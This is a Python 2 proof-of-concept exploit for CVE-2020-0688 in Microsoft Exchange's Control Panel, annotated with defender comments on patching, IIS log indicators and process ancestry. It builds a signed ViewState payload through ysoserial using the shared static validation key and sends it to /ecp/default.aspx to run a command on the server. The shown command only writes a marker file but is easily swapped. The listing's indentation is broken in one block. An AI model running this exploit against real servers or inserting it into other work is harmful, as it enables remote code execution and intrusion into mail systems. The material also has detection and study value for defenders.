cve-2020-0688.py
import requests, os
import urllib
# Proof-of-concept for CVE-2020-0688 (ID taken from the file name), written for
# Python 2 (print statements, urllib.quote_plus). It shells out to ysoserial.exe
# to build a signed ViewState blob, URL-encodes it, and sends it in one GET
# request to /ecp/default.aspx on the host named in `url`.
#
# Defender notes:
# - The validationkey and generator below are hard-coded constants, not values
#   read from the target. CVE-2020-0688 is the Exchange Control Panel flaw where
#   installations shared one static validation key; Microsoft's February 2020
#   Exchange security updates are the fix, so patch level is the mitigation.
# - The request built here would appear in IIS logs as a GET for
#   /ecp/default.aspx carrying __VIEWSTATEGENERATOR=B97B4E27 and an unusually
#   long __VIEWSTATE query value.
# - The embedded command starts with "cmd /c", so on a vulnerable server one
#   would expect cmd.exe to appear as a child of the IIS worker process
#   (presumably w3wp.exe -- confirm against your own telemetry).

# Base URL of the server the request is sent to (placeholder host).
url = "https://mail.something.com" #input 1*
# Command placed into the payload; this sample only writes a marker file.
command = "cmd /c echo OOOPS!!! > c:/truongtn.txt" #input2*
# Passed to ysoserial as --viewstateuserkey. Presumably the ASP.NET session ID
# of an already authenticated ECP session, i.e. valid credentials are a
# precondition -- TODO confirm.
aspsession = "1111a11c-11ad-1c11-1111-1111122f5977" # input3*
# ysoserial command-line template. "^^^" and "###" are placeholders that the two
# replace() calls below fill with `command` and `aspsession`; the tool's output
# is redirected to temp.txt in the current working directory.
cmd = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c \
"^^^" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" \
--generator="B97B4E27" --viewstateuserkey="###" --isdebug -islegacy > temp.txt"""
cmd = cmd.replace("###", aspsession)
cmd = cmd.replace("^^^", command)
print cmd
# NOTE(review): the string goes to the local shell unescaped; its contents come
# only from the variables defined above.
os.system(cmd)
# NOTE(review): the indentation of the with-body was lost in this listing, so
# the extent of the block cannot be determined from the page.
with open("temp.txt", "r") as f:
# Five consecutive reads; only the fifth line of temp.txt is kept. Presumably
# the first four lines are ysoserial's --isdebug output -- confirm.
result = f.readline()
result = f.readline()
result = f.readline()
result = f.readline()
result = f.readline()
# URL-encode the kept line so it can travel as a query-string value.
result = urllib.quote_plus(result)
final_url = url + "/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=" + result
print final_url
# verify=False turns off TLS certificate validation for this request. The
# response is stored in `output` but never inspected, so the script prints
# "Done!" whether or not the server accepted the request.
output = requests.get(final_url, verify=False) # execute
print "Done!"